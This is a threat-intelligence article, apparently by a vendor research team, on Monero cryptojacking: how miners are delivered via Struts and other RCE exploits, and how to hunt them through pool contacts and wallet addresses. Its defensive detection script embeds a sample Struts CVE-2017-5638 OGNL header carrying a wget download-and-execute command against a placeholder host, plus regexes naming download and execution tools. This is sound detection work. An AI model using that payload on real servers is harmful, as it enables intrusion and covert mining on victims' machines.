As cryptocurrency investing has become the latest fad, threat actors have, as usual, developed malware to get in on the action. In April 2017, the Global Threat Intelligence Center (GTIC) came across a Monero (XMR) mining malware sample. As we continued to discover more and more of these samples, we decided to research and track these miners over time in an attempt to map the threat landscape and the associated risk. This report details the different angles used to hunt down XMR mining malware and provides a basic overview of the campaigns analyzed during our research.
Brief overview of blockchain and cryptocurrency
Before diving into coin mining malware and its associated tactics, techniques, and procedures (TTPs), it is important to have a basic understanding of the technology at play. Coin miners are programs that mine cryptocurrency by solving computationally expensive puzzles (proof of work); malicious coin miners do the same thing on a victim's hardware and send the reward to the attacker. Cryptocurrency, a legitimate form of digital currency, operates on blockchain technology. In short, a blockchain is a distributed digital ledger that records and confirms transactions between parties. Transactions are grouped into "blocks", each of which carries a timestamp and is chained to the previous block with a cryptographic hash, so that altering an earlier block invalidates everything after it. A blockchain is typically replicated across a public peer-to-peer (P2P) network, allowing any participant to verify the integrity of the transactions without trusting a central party. In 2017 alone, several cryptocurrencies saw increases in value of 1,000-5,000%!
Monero (XMR) is the cryptocurrency preferred by threat actors. That preference stems from the privacy XMR provides: ring signatures obscure the sender, one-time stealth addresses obscure the recipient, and confidential transactions hide the amount, which together make tracing the flow of funds impractical. Just as important for an attacker, Monero's CryptoNight proof-of-work algorithm was designed to be mined efficiently on ordinary CPUs, so a compromised server or workstation produces meaningful returns, which is not the case for Bitcoin and other coins dominated by specialized mining hardware.
Defining the coinminer variant
As researchers, we readily recognize the terms banking trojan, ransomware, worm, spyware, and so on. In 2017, it became important to settle on the correct language for describing coin mining malware, which led the GTIC to the following definition:
“Coin mining malware is any software, code, or script unknowingly used by a user or machine to mine cryptocurrency for another party.” – GTIC
You may also come across the term "cryptojacking", which is identical in definition and meaning.
Our first introduction to coin mining malware
As stated, in April 2017 the GTIC was analyzing active exploit attempts against CVE-2017-5638 (the Apache Struts 2 Jakarta Multipart parser vulnerability), which led us to our first coin miner sample. The HTTP request carrying the exploit instructed the targeted server to run arbitrary commands that downloaded the first stage of the malware. Analysis determined this first stage was a simple shell script designed to kill off any previous infection (including competing miners) before downloading the final binary along with a configuration file. On execution, the binary read the JSON configuration file to learn which mining pool to connect to; the file also held the attacker's wallet address, the pool password, and the mining algorithm, which in this case was cryptonight.
Analysis identified this malware as a variant of 'cpuminer', a legitimate, publicly available coin miner hosted on GitHub. Several analyses later, the GTIC concluded that this pattern (a public miner plus an attacker-supplied configuration, dropped after RCE) was the standard for cryptojacking campaigns. Please refer to the GTIC Monero Mining Malware Report for further breakdowns of our findings from hunting cryptojacking campaigns, along with IoCs.
Leveraging public sandboxes for data
Across the campaigns analyzed, it was evident that coin miners contact a mining pool at some point during the infection. Not all coin miners use the same pool, however, as the pool depends on the cryptocurrency being mined. A mining pool combines the processing power of many participants and splits the reward in proportion to the work each one contributes, so every miner must connect to its pool and identify itself with the wallet address it is paid to. That pool connection is therefore a reliable hunting point. Using VirusTotal and Hybrid-Analysis, GTIC researchers wrote a simple script and a simple YARA signature to pull all samples that communicated with at least one of the 37 domains listed as XMR mining pools by supportxmr.com.
These data pulls allowed researchers to gather ~12,200 samples dating back to 2014, the most common file type being Windows PE executables. More insight, as well as IoCs, can be found in the GTIC Monero Mining Malware Report.
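The two hunting angles described above (the wallet, pool and algorithm fields in a dropped miner configuration, and the pool domains a sample contacts in a sandbox) reduce to the same triage logic. The following is an added example written for this article, not GTIC's script or the cpuminer project's code. The config.json, the pool-domain list and the sandbox report domains are all constructed stand-ins: the field names follow the cpuminer-multi configuration layout, but the hostnames and wallet address are dummies rather than real indicators.

```python
import json
from urllib.parse import urlparse

# Constructed sample config in the cpuminer-multi style the article describes
# (pool URL, wallet address as "user", pool password, algorithm). Dummy values.
SAMPLE_CONFIG = """
{
  "algo": "cryptonight",
  "url": "stratum+tcp://pool.example-xmr.test:3333",
  "user": "4AexampleWalletAddressNotReal",
  "pass": "x",
  "threads": 4
}
"""

# Constructed stand-in for the supportxmr.com pool-domain list used in the
# article; these are not real pool hostnames.
XMR_POOL_DOMAINS = {"pool.example-xmr.test", "xmr.pool-two.test"}

# Monero used CryptoNight variants in the period the article covers.
CRYPTONIGHT_ALGOS = {"cryptonight", "cryptonight-lite", "cryptonight-heavy"}

# Constructed list of domains a sandbox report might show a sample contacting.
SAMPLE_REPORT_DOMAINS = ["time.example.test", "xmr.pool-two.test", "eu.pool.example-xmr.test"]


def pool_host(url):
    """Hostname of a pool URL; bare host:port (no scheme) is common in miner configs."""
    if not url:
        return None
    if "://" not in url:
        url = "stratum+tcp://" + url
    return urlparse(url).hostname


def is_known_pool(host, pool_domains=XMR_POOL_DOMAINS):
    """Exact or subdomain match; pools expose many regional subdomains (eu., us., ...)."""
    if not host:
        return False
    host = host.lower()
    return host in pool_domains or any(host.endswith("." + d) for d in pool_domains)


def triage_config(raw, pool_domains=XMR_POOL_DOMAINS):
    """Pull the mining indicators out of a dropped miner config and score them."""
    cfg = json.loads(raw)
    algo = str(cfg.get("algo", "")).lower()
    host = pool_host(cfg.get("url", ""))
    return {
        "algo": algo,
        "cryptonight": algo in CRYPTONIGHT_ALGOS,
        "pool_host": host,
        "known_pool": is_known_pool(host, pool_domains),
        "wallet": cfg.get("user"),   # the attacker's payout address: a strong pivot for clustering
        "password": cfg.get("pass"),
    }


def pool_contacts(contacted_domains, pool_domains=XMR_POOL_DOMAINS):
    """Filter a sandbox report's contacted-domain list down to known mining pools."""
    return [d for d in contacted_domains if is_known_pool(d, pool_domains)]


if __name__ == "__main__":
    print(triage_config(SAMPLE_CONFIG))
    print(pool_contacts(SAMPLE_REPORT_DOMAINS))
```

The wallet address is the most useful field to pivot on: pool domains are shared by every miner, legitimate or not, whereas a single payout address ties otherwise unrelated samples to one operator. The subdomain match matters in practice because pools publish regional endpoints under the listed domain, and an exact-match list would miss them.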
Identifying delivery mechanisms
As we continued our analysis, it was important to identify the delivery mechanisms threat actors were using. In the cases analyzed, the most common was a download triggered by arbitrary commands executed after exploiting a vulnerability that allowed remote code execution (RCE). Threat actors mainly targeted JBoss, Apache Struts, WebLogic and IIS vulnerabilities, and the GTIC is continuing to analyze WebLogic exploits that lead to coin miners. Phishing was the second most popular mechanism, followed by SSH and RDP brute-forcing and even URI command injection. A more detailed list of the specific vulnerabilities can be found in the GTIC Monero Mining Malware Report.
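Since RCE-then-download was the dominant delivery mechanism, the request that delivers the first stage is worth detecting at the web tier, before any miner runs. Below is an added example of that detection logic, written for this article rather than taken from GTIC or any vendor, applied to constructed HTTP requests. The first request mimics the CVE-2017-5638 pattern described earlier (an OGNL expression in the Content-Type header carrying a download-and-execute command); the hostnames, addresses and payload text are made up for the example.

```python
import re

# Constructed sample requests (not captured traffic). Request 0 mimics the Struts
# CVE-2017-5638 pattern: OGNL in Content-Type carrying a download-and-execute
# command. Request 1 is a benign upload. Request 2 is OGNL without a download.
SAMPLE_REQUESTS = [
    {
        "src": "203.0.113.10",
        "method": "POST",
        "path": "/struts2-showcase/upload.action",
        "headers": {
            "Content-Type": (
                "%{(#_='multipart/form-data').(#cmd='wget -q http://dl.example.test/x.sh "
                "-O /tmp/x.sh;chmod +x /tmp/x.sh;/tmp/x.sh').(#p=new java.lang.ProcessBuilder"
                "({'/bin/bash','-c',#cmd})).(#p.start())}"
            )
        },
    },
    {
        "src": "198.51.100.7",
        "method": "POST",
        "path": "/upload.action",
        "headers": {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk"},
    },
    {
        "src": "203.0.113.11",
        "method": "GET",
        "path": "/index.action",
        "headers": {"Content-Type": "${(#cmd='id').(#x=1)}"},
    },
]

# A legitimate media type is always token/token followed by optional parameters.
# Checking structure, not just for "%{", also catches obfuscated OGNL variants.
MEDIA_TYPE_RE = re.compile(r"^[\w!#$%&'*+.^`|~-]+/[\w!#$%&'*+.^`|~-]+(\s*;.*)?$")
OGNL_RE = re.compile(r"[%$]\{")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.I)
EXEC_RE = re.compile(r"(chmod\s+\+x|\|\s*(sh|bash)\b|\b(sh|bash)\s+/|ProcessBuilder|Runtime)", re.I)


def classify_request(req):
    """Return the list of findings for one request; empty list means nothing suspicious."""
    findings = []
    ct = req["headers"].get("Content-Type", "")
    if ct and not MEDIA_TYPE_RE.match(ct):
        findings.append("malformed_content_type")
    if OGNL_RE.search(ct):
        findings.append("ognl_in_content_type")
    if DOWNLOADER_RE.search(ct) and EXEC_RE.search(ct):
        findings.append("download_and_execute")
    return findings


def hunt(requests):
    """Keep only requests with findings, as (source, path, findings) tuples."""
    results = []
    for req in requests:
        findings = classify_request(req)
        if findings:
            results.append((req["src"], req["path"], findings))
    return results


if __name__ == "__main__":
    for src, path, findings in hunt(SAMPLE_REQUESTS):
        print(src, path, findings)
```

The structural check on Content-Type is the one to keep even after the Struts patch is applied: a header that does not start with type/subtype has no legitimate reason to exist, whatever the injected expression looks like. The download-and-execute pattern is generic to the delivery mechanism the article describes and applies equally to the JBoss and WebLogic exploit requests, which carry their commands in the request body rather than a header.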
Maliciously used coin miners and cryptojacking are, at the time of this writing, both very popular and are expected only to increase throughout 2018. As cryptocurrency investing and mining draw more attention, values will continue to fluctuate. Threat actors motivated by monetary gain will continue to use coin miners in their operations to produce funds while remaining anonymous. Our analysis shows both opportunistic and more advanced coin mining operations, with some operations attributed by other researchers to advanced persistent threat (APT) groups. The TTPs used will only become more sophisticated, increasing the difficulty of detection. The GTIC recommends reviewing the GTIC Monero Mining Malware Report, which gives more insight into our analysis and findings on malicious coin mining, as well as the approaches we took to hunting and gathering the data.